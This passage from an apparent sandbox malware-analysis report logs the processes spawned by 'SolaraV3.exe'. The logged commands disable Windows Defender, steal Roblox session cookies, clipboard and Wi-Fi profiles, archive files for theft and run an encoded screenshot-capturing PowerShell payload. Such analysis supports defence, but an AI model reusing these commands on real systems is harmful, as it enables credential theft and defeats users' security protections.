AAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: python3.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libffi-7.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: sqlite3.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libcrypto-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: libssl-1_1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
